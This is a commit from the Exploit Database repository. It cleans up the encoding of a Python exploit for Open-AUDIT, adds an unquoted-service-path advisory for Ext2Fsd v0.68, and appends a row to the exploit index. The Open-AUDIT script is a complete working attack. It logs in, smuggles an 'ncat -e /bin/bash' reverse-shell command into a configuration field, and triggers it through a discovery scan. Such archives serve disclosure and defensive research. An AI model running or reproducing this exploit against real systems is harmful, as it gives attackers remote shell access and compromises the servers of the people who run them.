DB: 2021-03-25

2 changes to exploits/shellcodes

Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path
This commit is contained in:
Offensive Security 2021-03-25 05:02:09 +00:00
parent 3f12367de8
commit 2f2c713a12
3 changed files with 56 additions and 32 deletions

View file

@ -16,44 +16,40 @@ import string
from bs4 import BeautifulSoup from bs4 import BeautifulSoup
from urllib.parse import quote from urllib.parse import quote
warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4') warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
if len(sys.argv) !=3D 6: if len(sys.argv) != 6:
print("[~] Usage : ./openaudit-exploit.py url username password ip port= print("[~] Usage : ./openaudit-exploit.py url username password ip port")
")
exit() exit()
url =3D sys.argv[1] url = sys.argv[1]
username =3D sys.argv[2] username = sys.argv[2]
password =3D sys.argv[3] password = sys.argv[3]
ip =3D sys.argv[4] ip = sys.argv[4]
port =3D sys.argv[5] port = sys.argv[5]
request =3D requests.session() request = requests.session()
def inject_payload(): def inject_payload():
configuration_path =3D url+"/en/omk/open-audit/configuration/90" configuration_path = url+"/en/omk/open-audit/configuration/90"
data =3D 'data=3D{"data":{"id":"90","type":"configuration","attributes"= data = 'data={"data":{"id":"90","type":"configuration","attributes":{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, port)
:{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, =
port)
request.patch(configuration_path, data) request.patch(configuration_path, data)
print("[+] Payload injected in settings") print("[+] Payload injected in settings")
def start_discovery(): def start_discovery():
discovery_path =3D url+"/en/omk/open-audit/discoveries/create" discovery_path = url+"/en/omk/open-audit/discoveries/create"
post_discovery_path =3D url+"/en/omk/open-audit/discoveries" post_discovery_path = url+"/en/omk/open-audit/discoveries"
scan_name =3D "".join([random.choice(string.ascii_uppercase) for i in r= scan_name = "".join([random.choice(string.ascii_uppercase) for i in range(10)])
ange(10)]) req = request.get(discovery_path)
req =3D request.get(discovery_path)
response =3D req.text response = req.text
soup =3D BeautifulSoup(response, "html5lib") soup = BeautifulSoup(response, "html5lib")
token =3D soup.findAll('input')[5].get("value") token = soup.findAll('input')[5].get("value")
buttons =3D soup.findAll("button") buttons = soup.findAll("button")
headers =3D {"Referer" : discovery_path} headers = {"Referer" : discovery_path}
request_data =3D { request_data = {
"data[attributes][name]":scan_name, "data[attributes][name]":scan_name,
"data[attributes][other][subnet]":"10.10.10.1/24", "data[attributes][other][subnet]":"10.10.10.1/24",
"data[attributes][other][ad_server]":"", "data[attributes][other][ad_server]":"",
@ -101,23 +97,21 @@ ange(10)])
} }
print("[+] Creating discovery ..") print("[+] Creating discovery ..")
req =3D request.post(post_discovery_path, data=3Drequest_data, headers= req = request.post(post_discovery_path, data=request_data, headers=headers, allow_redirects=False)
=3Dheaders, allow_redirects=3DFalse) disocvery_url = url + req.headers['Location'] + "/execute"
disocvery_url =3D url + req.headers['Location'] + "/execute"
print("[+] Triggering payload ..") print("[+] Triggering payload ..")
print("[+] Check your nc ;)") print("[+] Check your nc ;)")
request.get(disocvery_url) request.get(disocvery_url)
def login(): def login():
login_info =3D { login_info = {
"redirect_url": "/en/omk/open-audit", "redirect_url": "/en/omk/open-audit",
"username": username, "username": username,
"password": password "password": password
} }
login_request =3D request.post(url+"/en/omk/open-audit/login", login_in= login_request = request.post(url+"/en/omk/open-audit/login", login_info)
fo) login_text = login_request.text
login_text =3D login_request.text
if "There was an error authenticating" in login_text: if "There was an error authenticating" in login_text:
return False return False
else: else:

View file

@ -0,0 +1,29 @@
# Exploit Title: Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path
# Date: 2021-1-19
# Exploit Author: Mohammed Alshehri
# Software Link: https://sourceforge.net/projects/ext2fsd/files/latest/download
# Version: 0.68
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
# Service info:
C:\Users\m507>sc qc Ext2Srv
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Ext2Srv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Ext2Fsd\Ext2Srv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Ext2 Management Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\m507>
# Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.

View file

@ -11308,6 +11308,7 @@ id,file,description,date,author,type,platform,port
49702,exploits/windows/local/49702.txt,"ELAN Touchpad 15.2.13.1_X64_WHQL - 'ETDService' Unquoted Service Path",2021-03-23,SamAlucard,local,windows, 49702,exploits/windows/local/49702.txt,"ELAN Touchpad 15.2.13.1_X64_WHQL - 'ETDService' Unquoted Service Path",2021-03-23,SamAlucard,local,windows,
49703,exploits/windows/local/49703.txt,"ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path",2021-03-23,SamAlucard,local,windows, 49703,exploits/windows/local/49703.txt,"ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path",2021-03-23,SamAlucard,local,windows,
49704,exploits/windows/local/49704.txt,"Elodea Event Collector 4.9.3 - 'ElodeaEventCollectorService' Unquoted Service Path",2021-03-23,"Alan Mondragon",local,windows, 49704,exploits/windows/local/49704.txt,"Elodea Event Collector 4.9.3 - 'ElodeaEventCollectorService' Unquoted Service Path",2021-03-23,"Alan Mondragon",local,windows,
49706,exploits/windows/local/49706.txt,"Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path",2021-03-24,"Mohammed Alshehri",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139

Can't render this file because it is too large.